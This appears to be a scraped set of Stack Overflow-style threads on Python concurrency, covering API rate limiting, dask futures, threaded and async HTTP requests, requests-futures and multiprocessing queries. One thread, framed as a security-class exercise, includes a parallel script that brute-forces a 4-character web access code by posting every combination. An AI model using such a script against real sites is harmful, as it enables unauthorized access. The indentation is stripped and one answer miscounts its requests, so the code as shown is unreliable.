I am using Google places API which has a query per second limit of 10. This means I cannot make more than 10 requests within a second. If we were using Serial execution this wouldn't be an issue as the APIs avg response time is 250 ms, so i will be able to make just 4 calls in a second.
To utilize the entire 10 QPS limit i used multithreading and made parallel API calls. But now i need to control the number of calls that can happen in a second, it should not go beyond 10 (google API starts throwing errors if i cross the limit)
Below is the code that i have so far, I am not able to figure out why the program just gets stuck sometimes or takes alot longer than required.
import time
from datetime import datetime
import random
from threading import Lock
from concurrent.futures import ThreadPoolExecutor as pool
import concurrent.futures
import requests
import matplotlib.pyplot as plt
from statistics import mean
from ratelimiter import RateLimiter
def make_parallel(func, qps=10):
lock = Lock()
threads_execution_que = []
limit_hit = False
def qps_manager(arg):
current_second = time.time()
lock.acquire()
if len(threads_execution_que) >= qps or limit_hit:
limit_hit = True
if current_second - threads_execution_que[0] <= 1:
time.sleep(current_second - threads_execution_que[0])
current_time = time.time()
threads_execution_que.append(current_time)
lock.release()
res = func(arg)
lock.acquire()
threads_execution_que.remove(current_time)
lock.release()
return res
def wrapper(iterable, number_of_workers=12):
result = []
with pool(max_workers=number_of_workers) as executer:
bag = {executer.submit(func, i): i for i in iterable}
for future in concurrent.futures.as_completed(bag):
result.append(future.result())
return result
return wrapper
#make_parallel
def api_call(i):
min_func_time = random.uniform(.25, .3)
start_time = time.time()
try:
response = requests.get('https://jsonplaceholder.typicode.com/posts', timeout=1)
except Exception as e:
response = e
if (time.time() - start_time) - min_func_time < 0:
time.sleep(min_func_time - (time.time() - start_time))
return response
api_call([1]*50)
Ideally the code should take not more than 1.5 seconds, but currently it is taking about 12-14 seconds.
The script speeds up to its expected speed as soon as i remove the QPS manager logic.
Please do suggest what i am doing wrong and also, if there is any package available already which does this mechanism out of the box.
Looks like ratelimit does just that:
from ratelimit import limits, sleep_and_retry
#make_parallel
#sleep_and_retry
#limits(calls=10, period=1)
def api_call(i):
try:
response = requests.get("https://jsonplaceholder.typicode.com/posts", timeout=1)
except Exception as e:
response = e
return response
EDIT: I did some testing and it looks like #sleep_and_retry is a little too optimistic, so just increase the period a little, to 1.2 second:
s = datetime.now()
api_call([1] * 50)
elapsed_time = datetime.now() - s
print(elapsed_time > timedelta(seconds=50 / 10))
Related
I need to return a tuple from a task which has to be unpacked in the main process because each element of the tuple will go to different dask tasks. I would like to avoid unnecessary communication so I think that the tuple elements should be Futures.
The best way I came up with is to scatter the data only to the same worker to get the future. Is there a better way to do it?
import numpy as np
import time
from dask.distributed import Client
from dask.distributed import get_client, get_worker
def other_task(data):
return len(data)
def costly_task():
start = time.time()
client = get_client()
data = np.arange(100000000)
metadata = len(data)
print('worker time', time.time() - start)
start = time.time()
future_data, future_metadata = client.scatter(data, workers=[get_worker().id]), client.scatter(metadata, workers=[get_worker().id])
print('scatter time', time.time() - start)
return future_data, future_metadata
if __name__ == '__main__':
client = Client(processes=True)
start = time.time()
future_data, future_metadata = client.submit(costly_task).result()
metadata = future_metadata.result()
print('costly task time', time.time() - start)
other_metadata = client.submit(other_task, future_data).result()
print('total time', time.time() - start)
The times I get with the script above are:
worker time 0.12443423271179199
scatter time 0.7880995273590088
costly task time 0.923513650894165
total time 0.9366424083709717
It is possible via delayed:
from dask.distributed import Client
from dask import delayed
#delayed(nout=3)
def costly_task():
return 1, 2, 3
client = Client(processes=True)
a, b, c = costly_task() # these are delayed
future_a, future_b, future_c = client.compute([a, b, c]) # split results
See this Q&A for further details.
so I have a code that needs to do HTTP requests (let's say 1000). I approached it in 3 ways so far with 50 HTTP requests. The results and codes are below.
The fastest is the approach using Threads, issue is that I lose some data (from what I understood due to the GIL). My questions are the following:
My understanding it that the correct approach in this case is to use Multiprocessing. Is there any way I can improve the speed of that approach? Matching the Threading time would be great.
I would guess that the higher the amount of links I have, the more time the Serial and Threading approach would take, while the Multiprocessing approach would increase much more slowly. Do you have any source that will allow me to get an estimate of the time it would take to run the code with n links?
Serial - Time To Run around 10 seconds
def get_data(link, **kwargs):
data = requests.get(link)
if "queue" in kwargs and isinstance(kwargs["queue"], queue.Queue):
kwargs["queue"].put(data)
else:
return data
links = [link_1, link_2, ..., link_n]
matrix = []
for link in links:
matrix.append(get_data(link))
Threads - Time To Run around 0.8 of a second
def get_data_thread(links):
q = queue.Queue()
for link in links:
data = threading.Thread(target = get_data, args = (link, ), kwargs = {"queue" : q})
data.start()
data.join()
return q
matrix = []
q = get_data_thread(links)
while not q.empty():
matrix.append(q.get())
Multiprocessing - Time To Run around 5 seconds
def get_data_pool(links):
p = mp.Pool()
data = p.map(get_data, links)
return data
if __name__ == "__main__":
matrix = get_data_pool(links)
If I were to suggest anything, I would go with AIOHTTP. A sketch of the code:
import aiohttp
import asyncio
async def main(alink):
links = [link_1, link_2, ..., link_n]
matrix = []
async with aiohttp.ClientSession() as session:
async with session.get(alink) as resp:
return resp.data()
if __name__ == "__main__":
loop = asyncio.get_event_loop()
for link in links:
loop.run_until_complete(main(link))
So here's the problem, our security teacher made a site that requires authentification and then asks for a code (4 characters) so that you can access to a file. He told us to write a brute force program in Python (any library we want) that can find the password. So to do that I wanted first to make a program that can try random combinations on that code field just to have an idea about the time of each request ( I'm using requests library) and the result was disapointing each request takes around 8 secs.
With some calculations: 4^36=13 436 928 possible combination that would take my program around 155.52 days.
I would really apreciate if any one can help me out to make that faster. ( he told us that it is possible to make around 1200 combinations per sec)
Here's my code:
import requests
import time
import random
def gen():
alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
pw_length = 4
mypw = ""
for i in range(pw_length):
next_index = random.randrange(len(alphabet))
mypw = mypw + alphabet[next_index]
return mypw
t0 = time.clock()
t1 = time.time()
cookie = {'ig': 'b0b5294376ef12a219147211fc33d7bb'}
for i in range(0,5):
t2 = time.clock()
t3 = time.time()
values = {'RECALL':gen()}
r = requests.post('http://www.example.com/verif.php', stream=True, cookies=cookie, data=values)
print("##################################")
print("cpu time for req ",i,":", time.clock()-t2)
print("wall time for req ",i,":", time.time()-t3)
print("##################################")
print("##################################")
print("Total cpu time:", time.clock()-t0)
print("Total wall time:", time.time()-t1)
Thank you
A thing you could try is to use a Pool of workers to do multiple requests in parallel passing a password to each worker. Something like:
import itertools
from multiprocessing import Pool
def pass_generator():
for pass_tuple in itertools.product(alphabet, repeat=4):
yield ''.join(pass_tuple)
def check_password(password):
values = {'RECALL': password}
r = requests.post('http://www.example.com/verif.php', stream=True, cookies=cookie, data=values)
# Check response here.
pool = Pool(processes=NUMBER_OF_PROCESSES)
pool.map(check_password, pass_generator())
My current code as it stands prints an empty list, how do I wait for all requests and callbacks to finish before continuing with the code flow?
from requests_futures.sessions import FuturesSession
from time import sleep
session = FuturesSession(max_workers=100)
i = 1884001540 - 100
list = []
def testas(session, resp):
print(resp)
resp = resp.json()
print(resp['participants'][0]['stats']['kills'])
list.append(resp['participants'][0]['stats']['kills'])
while i < 1884001540:
url = "https://acs.leagueoflegends.com/v1/stats/game/NA1/" + str(i)
temp = session.get(url, background_callback=testas)
i += 1
print(list)
From looking at session.py in requests-futures-0.9.5.tar.gz its necesssary to create a future in order to wait for its result as shown in this code:
from requests_futures import FuturesSession
session = FuturesSession()
# request is run in the background
future = session.get('http://httpbin.org/get')
# ... do other stuff ...
# wait for the request to complete, if it hasn't already
response = future.result()
print('response status: {0}'.format(response.status_code))
print(response.content)
As shown in the README.rst a future can and should be created for every session.get() and waited on to complete.
This might be applied in your code as follows starting just before the while loop:
future = []
while i < 1884001540:
url = "https://acs.leagueoflegends.com/v1/stats/game/NA1/" + str(i)
future.append(session.get(url, background_callback=testas)
i += 1
for f in future:
response = f.result()
# the following print statements may be useful for debugging
# print('response status: {0}'.format(response.status_code))
# print(response.content, "\n")
print(list)
I'm not sure how your system will respond to a large number (1884001440) of futures and another way to do it is by processing them in smaller groups say 100 or 1000 at a time. It might be wise to test the script with a relatively small number of them at the beginning to find out how fast they return results.
from here https://pypi.python.org/pypi/requests-futures it says
from requests_futures.sessions import FuturesSession
session = FuturesSession()
# first request is started in background
future_one = session.get('http://httpbin.org/get')
# second requests is started immediately
future_two = session.get('http://httpbin.org/get?foo=bar')
# wait for the first request to complete, if it hasn't already
response_one = future_one.result()
so it seems that .result() is what you are looking for
Another confused parallel coder here!
Our internal Hive database has an API layer to which we need to use to access the data. There is a 300 second query timeout limit, so I wanted to use multiprocessing to execute multiple queries in parallel:
from multiprocessing import Pool
import pandas as pd
import time
from hive2pandas_anxpy import Hive2Pandas # custom module for querying our Hive db and converting the results to a Pandas dataframe
import datetime
def run_query(hour):
start_time = time.time()
start_datetime = datetime.datetime.now()
query = """SELECT id, revenue from table where date='2014-05-20 %s' limit 50""" % hour
h2p = Hive2Pandas(query, 'username')
h2p.run()
elapsed_time = int(time.time() - start_time)
end_datetime = datetime.datetime.now()
return {'query':query, 'start_time':start_datetime, 'end_time':end_datetime, 'elapsed_time':elapsed_time, 'data':h2p.data_df}
if __name__ == '__main__':
start_time = time.time()
pool = Pool(4)
hours = ['17','18','19']
results = pool.map_async(run_query, hours)
pool.close()
pool.join()
print int(time.time() - start_time)
The issue I'm having is that one of the queries always returns no data, but when I run the same query in the usual fashion, it returns data. Since I'm new to multiprocessing, I'm wondering if there are there any obvious issues with how I'm using it above?
I think the issue you are having is that the results object is not ready by the time you want to use it. Also if you have a known amount of time for a timeout, I would suggest using that to your advantage in the code.
This code shows an example of how you can force a timeout after 300 seconds if the results from all of them are not collected by then.
if __name__ == '__main__':
start_time = time.time()
hours = ['17','18','19']
with Pool(processes=4) as pool:
results = pool.map_async(run_query, hours)
print(results.get(timeout=300))
print int(time.time() - start_time)
Otherwise you should still be using results.get() to return your data, or specify a callback function for map_async.